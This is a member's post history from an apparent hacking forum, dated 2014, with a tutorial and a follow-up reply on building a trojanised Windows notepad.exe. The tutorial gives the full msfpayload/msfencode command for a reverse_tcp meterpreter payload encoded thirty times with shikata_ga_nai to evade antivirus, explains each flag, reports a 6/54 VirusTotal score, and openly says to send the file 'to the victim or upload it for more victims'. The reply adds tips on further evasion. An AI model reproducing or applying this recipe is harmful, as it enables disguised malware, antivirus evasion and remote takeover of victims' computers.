Show Posts

This section allows you to view all posts made by this member. Note that you can only see posts made in areas you currently have access to.


Messages - swartz

Pages: [1]
1
Hacking and Security / Re: msfencode and payload creation
« on: November 24, 2014, 06:08:54 pm »
Quote from: @rjun on November 24, 2014, 05:35:07 am
i have encoded my payload with various encoding like you mentioned but my payload way detected by AV......So i researched and found that its best  to write your own shell in the most unique way, i think i read it on this forum!
Long Live Evilzone!!

Anyway any solution to avoid writing your own shell to avoid detection?


Hi mate if after encoding your payload are still detected from AV's try to remove the bad characters and genarate some Nop shellcode as i say in my tut. Dont know why it doesnt work for you with the simple way, really works for me but if you want have a look in this video https://www.youtube.com/watch?v=0RkNm7Rdhg0   was made from me for another member who faces the same prob. Hop that helps !!

2
Hacking and Security / msfencode and payload creation
« on: November 23, 2014, 07:07:55 pm »

Hi everyone in my first post i will show you how to create a reverse meterpreter payload from a "clear" windows exe file and then
we will encoded to avoid most Av's. I will use shikata_ga_nai as encoder but you can use more than one encoder for bettet result
and even more you can remove all the bad chars and generate some Nop shellcode for more advance result.


To see all the msfencoders you can use the msfsncode -l command.
In this tutorial i will use the notepad.exe from windows.


Before we start i will post all the variables will be given just for the people who dont know what every variable is.
-e = selection of encode
-c = how many time we will encode are payload
-t = file format
-x = determines the executable file that is what we want to encode
-o = save the new file


First copy the notepad.exe and paste it on your kali desktop.
Ok now we open are terminal and use this code:
Code: [Select]
msfpayload windows/meterpreter/reverse_tcp LHOST=XX.XX.XX.XX LPORT=XXXX R | msfencode -e x86/shikata_ga_nai -c 30 -t exe -x
/root/Desktop/notepad.exe -o /root/Desktop/notepad2.exe
and hit enter....wait until creates the payload and encoded 30 time as we
given. If everything was right you will see a notepad2.exe file on your desktop, thats are payload. So now we can sent are payload
to the victim or upload it for more victims.
You have to use multi/hanlder exploit and dont forget to use the same options with the payload (LPORT etc).
After uploaded to online scanner as virus_total the result was 6/54 good enough for me :)


note: sometimes if you use 2 encoders it may broke the payload and you will never get the session.
With the same way you can encode every payload.

Pages: [1]